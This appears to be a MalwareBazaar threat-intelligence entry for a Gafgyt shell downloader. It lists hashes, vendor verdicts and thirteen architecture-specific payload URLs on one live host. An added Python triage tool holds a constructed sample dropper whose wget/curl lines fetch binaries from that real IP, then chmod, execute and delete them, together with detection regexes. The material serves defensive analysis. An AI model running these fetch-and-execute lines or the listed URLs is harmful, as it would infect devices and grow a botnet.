MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 dbe0b127987330a7331c97199e8ac8171e01c1f66e62ef7309aef5e8bd7fc615. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: Gafgyt
Vendor detections: 5



SHA256 hash: dbe0b127987330a7331c97199e8ac8171e01c1f66e62ef7309aef5e8bd7fc615
SHA3-384 hash: 82c1b9f5010c236d22f64fa094408b6d7fef51436a89f685254faac20fc3cf33365b71337cc873536f371fffd965b7c2
SHA1 hash: 68b480c4195cf52672d65ae35b9bb8fd355d2364
MD5 hash: aebb35bf58a9bbd6350bacea057d0106
humanhash: speaker-jig-red-papa
File name: bins2.sh
Signature: Gafgyt
File size: 3'113 bytes
First seen: 2025-08-18 07:38:52 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 96:ohDQ459p3CeE6Xttz5XhwoHQ3oEPX/NqZKT/oj38l:myqS73PNt/C3c
TLSH: T13E51D9F602360E658F93D91AF2759F853267D4F621874B68E4DBA23980CC42D7061F90
Magika: shell
Reporter: abuse_ch
Tags: sh
IOCs (URLs associated with this sample and the SHA256 of the file hosted at each)

URL                           Malware sample (SHA256 hash)                                       Signature  Tags
http://207.167.64.12/2.mips   f758f794dbd3d35b0c4236269b1b78913596c18868e0a25848249248405fc9f8   Gafgyt     elf gafgyt ua-wget
http://207.167.64.12/2.mpsl   5d17d03d5f2ee245fc6cd1021d75913df3c959432b99d380e8a3638841062643   Gafgyt     elf gafgyt ua-wget
http://207.167.64.12/2.sh4    2167d964e35b585812d66a293dcb24748ecf0c6ea2c8c64d40c0ece6dcfbdaac   Gafgyt     elf gafgyt ua-wget
http://207.167.64.12/2.x86    14b8b6ac8a6d96e15edf83a71f042ca1b47128b8ba75439103eb88839f3eb898   Gafgyt     elf gafgyt ua-wget
http://207.167.64.12/2.arm6   72dbb20dccfd8bf3ba4e4b9d58a0d95de432e3e780a12f41bb171361e67776cd   Gafgyt     elf gafgyt ua-wget
http://207.167.64.12/2.i686   dfa2f76c20c39fbdd9d97f90fd9241f0635b3a0be6c238b0e11715e75c9c63ca   Gafgyt     elf gafgyt ua-wget
http://207.167.64.12/2.ppc    d28891a4b1871516cd07a57c125bc759492584ecb7ca43571dc26074bfeac8ab   Gafgyt     elf gafgyt ua-wget
http://207.167.64.12/2.i586   5612288ee73116ecf7178fd9fd98290352bdd8863178db3c3c07b4f742c19e67   Gafgyt     elf gafgyt ua-wget
http://207.167.64.12/2.m68k   618b6921b8ab050ce00b3ae4f56decd6ea6c609b627c9ac62da1ca3d842f7f73   Gafgyt     elf gafgyt ua-wget
http://207.167.64.12/2.sparc  c6b9d9efb681ff1ac0afe4b47103c519b68532bca79844f7e075e1ce999d74f8   Gafgyt     elf gafgyt ua-wget
http://207.167.64.12/2.arm4   d71cd66700fc7e1c1f921bea1df0722cfd5ba411fb434e42323d83cbbd06c136   Gafgyt     elf gafgyt ua-wget
http://207.167.64.12/2.arm5   f7c5e707383ac0efb2b3383e45c8e66a2bd3c5e66eff7244b691ba65741de7b0   Gafgyt     elf gafgyt ua-wget
http://207.167.64.12/2.arm7   58baecf3698e6810dd5fa6ce4cdf478f699270634f4a132314da68fc3e08c88a   Gafgyt     elf gafgyt ua-wget

All thirteen payloads sit on one host and differ only in the architecture suffix of the file name (mips, mpsl, sh4, x86, arm4-7, i586, i686, ppc, m68k, sparc), the usual layout of a Gafgyt dropper that fetches whichever build will run on the compromised device; the ua-wget tag records that the URLs were retrieved with a wget User-Agent.
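The page shows the URLs and hashes this script is tied to but not the body of bins2.sh itself, so the following is an added example, not code from MalwareBazaar or from the sample: a static triage helper that pulls the fetch URLs, target architectures and staging directories out of a wget/curl downloader script without running it, scores the fetch/chmod/execute/delete pattern, and cross-checks each URL against the payload table above. KNOWN_PAYLOADS is copied from that table; SAMPLE_SCRIPT is a constructed stand-in in the shape such droppers commonly take and is an assumption about the script's content, not a quote of it.

```python
"""Static triage of a multi-architecture wget/curl downloader script.

Added example for this MalwareBazaar entry, not code from MalwareBazaar
or from the sample. KNOWN_PAYLOADS comes from the IOC table on the page;
SAMPLE_SCRIPT is constructed (the page does not show bins2.sh's body).
"""
import re
from urllib.parse import urlparse

# Payload URL -> SHA256 of the hosted ELF, copied from this entry's IOC table.
KNOWN_PAYLOADS = {
    "http://207.167.64.12/2.mips":  "f758f794dbd3d35b0c4236269b1b78913596c18868e0a25848249248405fc9f8",
    "http://207.167.64.12/2.mpsl":  "5d17d03d5f2ee245fc6cd1021d75913df3c959432b99d380e8a3638841062643",
    "http://207.167.64.12/2.sh4":   "2167d964e35b585812d66a293dcb24748ecf0c6ea2c8c64d40c0ece6dcfbdaac",
    "http://207.167.64.12/2.x86":   "14b8b6ac8a6d96e15edf83a71f042ca1b47128b8ba75439103eb88839f3eb898",
    "http://207.167.64.12/2.arm6":  "72dbb20dccfd8bf3ba4e4b9d58a0d95de432e3e780a12f41bb171361e67776cd",
    "http://207.167.64.12/2.i686":  "dfa2f76c20c39fbdd9d97f90fd9241f0635b3a0be6c238b0e11715e75c9c63ca",
    "http://207.167.64.12/2.ppc":   "d28891a4b1871516cd07a57c125bc759492584ecb7ca43571dc26074bfeac8ab",
    "http://207.167.64.12/2.i586":  "5612288ee73116ecf7178fd9fd98290352bdd8863178db3c3c07b4f742c19e67",
    "http://207.167.64.12/2.m68k":  "618b6921b8ab050ce00b3ae4f56decd6ea6c609b627c9ac62da1ca3d842f7f73",
    "http://207.167.64.12/2.sparc": "c6b9d9efb681ff1ac0afe4b47103c519b68532bca79844f7e075e1ce999d74f8",
    "http://207.167.64.12/2.arm4":  "d71cd66700fc7e1c1f921bea1df0722cfd5ba411fb434e42323d83cbbd06c136",
    "http://207.167.64.12/2.arm5":  "f7c5e707383ac0efb2b3383e45c8e66a2bd3c5e66eff7244b691ba65741de7b0",
    "http://207.167.64.12/2.arm7":  "58baecf3698e6810dd5fa6ce4cdf478f699270634f4a132314da68fc3e08c88a",
}

# Constructed sample (NOT the real bins2.sh): the cd-to-writable-dir, fetch,
# chmod, execute, delete loop typical of Gafgyt/Mirai-style droppers.
SAMPLE_SCRIPT = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://207.167.64.12/2.mips; chmod +x 2.mips; ./2.mips; rm -rf 2.mips
wget http://207.167.64.12/2.arm7; chmod +x 2.arm7; ./2.arm7; rm -rf 2.arm7
curl -O http://207.167.64.12/2.x86; chmod 777 2.x86; ./2.x86; rm -rf 2.x86
wget http://207.167.64.12/2.sh4; chmod +x 2.sh4; ./2.sh4; rm -rf 2.sh4
"""

URL_RE = re.compile(r"https?://[^\s;'\"<>]+")            # fetch targets
CD_RE = re.compile(r"\bcd\s+(/\S*)")                      # staging directories tried
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")  # payload made executable
EXEC_RE = re.compile(r"(?:^|[;&|]\s*)\./\S+", re.M)       # ./payload run from cwd
RM_RE = re.compile(r"\brm\s+-rf?\s+\S+")                  # payload deleted afterwards


def extract_urls(script):
    """Fetched URLs in order of first appearance, deduplicated."""
    seen, out = set(), []
    for u in URL_RE.findall(script):
        if u not in seen:
            seen.add(u)
            out.append(u)
    return out


def arch_from_url(url):
    """Architecture hint from the payload name, e.g. '2.mips' -> 'mips'."""
    name = urlparse(url).path.rsplit("/", 1)[-1]
    return name.split(".", 1)[1] if "." in name else name


def lookup_sha256(digest):
    """URL this entry associates with a payload hash, or None if unknown."""
    digest = digest.lower()
    for url, known in KNOWN_PAYLOADS.items():
        if known == digest:
            return url
    return None


def triage(script):
    """Summarise a downloader script statically; never executes anything."""
    urls = extract_urls(script)
    hosts = {urlparse(u).hostname for u in urls}
    archs = [arch_from_url(u) for u in urls]
    reasons = []
    if len(set(archs)) >= 3 and len(hosts) == 1:
        reasons.append("fetches %d architecture-specific payloads from one host" % len(set(archs)))
    if CHMOD_RE.search(script):
        reasons.append("makes downloaded file executable")
    if EXEC_RE.search(script):
        reasons.append("executes file from current directory")
    if RM_RE.search(script):
        reasons.append("removes payload after execution")
    return {
        "urls": urls,
        "hosts": hosts,
        "architectures": archs,
        "staging_dirs": CD_RE.findall(script),
        "known_payloads": {u: KNOWN_PAYLOADS[u] for u in urls if u in KNOWN_PAYLOADS},
        "unknown_urls": [u for u in urls if u not in KNOWN_PAYLOADS],
        "reasons": reasons,
        "verdict": "downloader" if len(reasons) >= 3 else "inconclusive",
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SCRIPT).items():
        print(key, value)
```

Run it against a real dropper by replacing SAMPLE_SCRIPT with the file's text; the hosts set feeds an egress block rule, the staging_dirs list tells you where to look for dropped ELFs on a suspect device, and lookup_sha256 lets you match a recovered binary's hash to the URL it came from. The regexes are deliberately loose (any http URL, any chmod) because these scripts are often obfuscated only by spacing and operator changes; tighten them if you get false positives on legitimate install scripts.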

Intelligence


File Origin
# of uploads: 1
# of downloads: 30
Origin country: DE

Vendor Threat Intelligence
Verdict: Malicious
Threat: HEUR:Trojan-Downloader.Shell.Agent
Threat name: Linux.Trojan.Geninst
Status: Malicious
First seen: 2025-08-18 03:06:23 UTC
File Type: Text (Shell)
AV detection: 18 of 38 (47.37%)
Threat level: 5/5
Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
(These three behaviours are Windows API artefacts that a POSIX shell script cannot produce; they most likely come from a sandbox that ran the file on Windows, so treat them as noise rather than as properties of this sample. The downloader verdicts above are the signal.)
Please note that we are no longer able to provide a coverage score for VirusTotal.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method  Signature  File type  SHA256 hash
Web download     Gafgyt     sh         dbe0b127987330a7331c97199e8ac8171e01c1f66e62ef7309aef5e8bd7fc615 (this sample)

Delivery method: Distributed via web download